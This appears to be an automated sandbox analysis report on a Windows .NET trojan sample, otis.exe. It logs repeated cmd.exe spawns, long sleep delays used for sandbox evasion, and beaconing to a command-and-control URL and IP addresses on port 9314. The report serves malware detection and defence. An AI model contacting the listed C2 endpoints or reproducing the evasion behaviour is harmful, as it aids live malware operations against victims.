Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior

Source: C:\Users\user\Desktop\otis.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Section loaded: sspicli.dll	Jump to behavior

Source: otis.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: otis.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: otis.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: otis.exe

Static PE information: 0xB658ECE9 [Sat Dec 11 08:18:49 2066 UTC]

Source: C:\Users\user\Desktop\otis.exe

Code function: 0_2_00007FFD9B8A00BD pushad ; iretd

0_2_00007FFD9B8A00C1

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9314
Source: unknown	Network traffic detected: HTTP traffic on port 9314 -> 49759

Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\otis.exe	Memory allocated: 2107E290000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Memory allocated: 21018000000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\otis.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\otis.exe	Window / User API: threadDelayed 4141			Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Window / User API: threadDelayed 5715			Jump to behavior

Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1196	Thread sleep count: 4141 > 30	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1196	Thread sleep count: 5715 > 30	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99340s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608	Thread sleep time: -98796s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99340	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Thread delayed: delay time: 98796	Jump to behavior

Source: otis.exe, 00000000.00000002.4128577991.000002107E06B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\otis.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\otis.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user	Jump to behavior

Source: C:\Users\user\Desktop\otis.exe	Queries volume information: C:\Users\user\Desktop\otis.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\otis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\otis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	2 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
otis.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
otis.exe	52%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
federalrevenueboard.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://federalrevenueboard.com:93142	0%	Avira URL Cloud	safe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5h	0%	Avira URL Cloud	safe
http://federalrevenueboard.com	0%	Avira URL Cloud	safe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5P	0%	Avira URL Cloud	safe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5	0%	Avira URL Cloud	safe
http://federalrevenueboard.com:9314	0%	Avira URL Cloud	safe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
federalrevenueboard.com	91.132.92.231	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://federalrevenueboard.com:93142	otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5P	otis.exe, 00000000.00000002.4126891226.0000021000001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://federalrevenueboard.com	otis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000107000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000AF000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5h	otis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F3000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://federalrevenueboard.com:9314	otis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F9000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000270000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.132.92.231	federalrevenueboard.com	Moldova Republic of		200019	ALEXHOSTMD	false
192.121.170.106	unknown	Sweden		57169	EDIS-AS-EUAT	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554908
Start date and time:	2024-11-13 08:04:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	otis.exe
Detection:	MAL
Classification:	mal64.troj.winEXE@37/0@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 5 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:05:25	API Interceptor	12531514x Sleep call for process: otis.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ALEXHOSTMD	armv5l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
